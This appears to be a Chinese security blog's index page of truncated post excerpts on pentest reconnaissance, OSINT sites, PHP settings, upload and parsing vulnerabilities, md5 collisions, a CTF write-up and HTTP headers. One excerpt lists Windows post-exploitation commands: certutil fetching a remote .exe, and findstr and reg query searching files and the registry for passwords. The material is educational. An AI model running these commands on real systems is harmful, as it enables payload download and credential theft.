参考链接:https://www.cnblogs.com/old-cha/p/12926434.html
测试环境:kali linux2020技术:docker
WordPress安装
Docker拉取WordPress镜像1docker pull wordpress:latest
Docker拉取MySQL镜像1docker pull mysql:5.6
使用MySQL镜像运行容器1docker run -d --privileged=true --name OLDMysql -v /data/mysql:/var/lib/mysql -e MYSQL_ROOT_PASSWORD=...
从《metasploit魔鬼训练营》第三章整理
外围信息搜索外围信息搜索也叫“公开渠道信息收集”,可以google(OSINT)
通过DNS和IP地址挖掘目标网络信息
whois域名注册信息查询可以通过whois查询得到域名所有者、服务商、管理员邮件地址、域名注册日期和过期日期等等
得到的Name Server也可以用于后面的nslookup和dig
nslookup和dig域名查询
nslookup查询(得到的一般是非权威应答)
type=A(对IP地址进行解析)type=MX(查找邮件转发服务器)type=CNAME(别名记录)type=TXT(某条记录的说明)type=A...
渗透命令ertutil—–从远程url下载文件
案例:certutil -urlcache -split -f http://baidu.com/test.exe
findstr—–查找文件后缀结果
findstr /s /i “pass” .py
reg query HKLM /f password /t REG_SZ /s—–搜集注册表中的各种密码数据
查看有没有开启远程链接,运行下面命令:
REG QUERY “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConne...
基础kali下的whatweb命令
ICP备案/企业:
ICP备案查询网
ICP备案查询
天眼查
kali的whois命令
绕过CDN:
全球Ping在线测试
站长工具-ping测试
CA
DNSDumpster
IP查询
IPhistory
securitytrails
netcraft
17CE
kali下的nslookup、dig
IP/域名查询:
X威胁情报社区
埃文科技
138查询网
netcraft
maxmind
纯真
censys
webscan
综合工具/网站:
YouGetSignal
站长之家
Ladon工具
IP跟踪
IPlogger
实时全球攻击图ht...
什么是渗透测试渗透测试的起源和定义起源:20世纪90年代,一群受过职业训练的安全专家作为“红队”,对接收测试的防御方“蓝队”进行攻击,以实战的方式来检验目标系统防御体系与安全响应计划的有效性,简而言之,攻击方是红队,防守方是蓝队定义:渗透测试就是一种通过模拟恶意攻击者的技术与方法,挫败目标系统安全控制措施,取得访问控制权。并发现具备业务影响后果安全隐患的一种安全测试与评估方式。
渗透测试的分类渗透测试分为黑盒测试、白盒测试和灰盒测试
黑盒测试黑盒测试没有任何目标网络内部的拓扑等信息,最符合真实情况下黑客的攻击方式,但是比较费时费力,同时需要渗透测试者具备较高的技术能力
白盒测试白盒测试也...
PHP_INI_*常量的定义
常量
含义
PHP_INI_USER
可在用户的PHP脚本或Windows注册表中设置
PHP_INI_PERDIR
可在php.ini .htaccess或httpd.confg中设置
PHP_INI_SYSTEM
可在php.ini或httpd.conf中设置
PHP_INI_ALL
可在任何地方设置
php.ini only
仅可在php.ini中设置
PHP核心配置详解register_globals
介绍:当选项开启为on时,将GET、POST等方式提交上来的参数注册成全局变量。
存在:PHP5.3.0起被废弃,PHP...
2020.6.11第一次更新前言:上传漏洞,简单来说,就是后端对用户上传上来的文件没有做好格式验证和内容检测,导致用户可以上传任意文件。
解析漏洞常见的Web容器有IIS、Nginx、Apache、Tomcat等
IIS6.0解析漏洞IIS6.0版本存在两个解析漏洞,然而官方并不认为这是漏洞,因此这个漏洞现在依然存在。
.asp、.asa后缀的文件夹当建立*.asa、*.asp格式的文件夹时,其下的任意文件都会被当成asp文件来执行。
example:建立文件夹parsing.asp和其下文件test.txt(test.txt的内容是<%=NOW()%>)
分析:一般来说I...
参考:https://blog.csdn.net/zz_Caleb/article/details/84947371md5的碰撞,在PHP的数的处理中,0开头的字符串会被转换成0,所以才会有md5碰撞。
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172730e开头的md5和原值: QNKCDZO0e830400451993494058024219903391s87892...
初步探索首先我们看到了一个界面
只有一个链接到”./post/index.php?file=show.php”
点进去之后只显示test5
查看源代码之后也找不到头绪SQL注入也没用
查找writeup 结果:
直接显示出网页源代码的Base64编码
拿去编码之后得出结果
123456789101112131415<html> <title>Bugku-ctf</title> <?php error_reporting(0); if(!$_GET[file]){echo '<a href="....
HTTP请求头
HTTP 头部解释
Accept:告诉WEB服务器自己接受什么介质类型,*/* 表示任何类型,type/* 表示该类型下的所有子类型,type/sub-type。
Accept-Charset: 浏览器申明自己接收的字符集Accept-Encoding: 浏览器申明自己接收的编码方法,通常指定压缩方法,是否支持压缩,支持什么压缩方法 (gzip,deflate)Accept-Language::浏览器申明自己接收的语言语言跟字符集的区别:中文是语言,中文有多种字符集,比如big5,gb2312,gbk等等。
Accept-Ranges:WEB服务器表明自己是否接受...
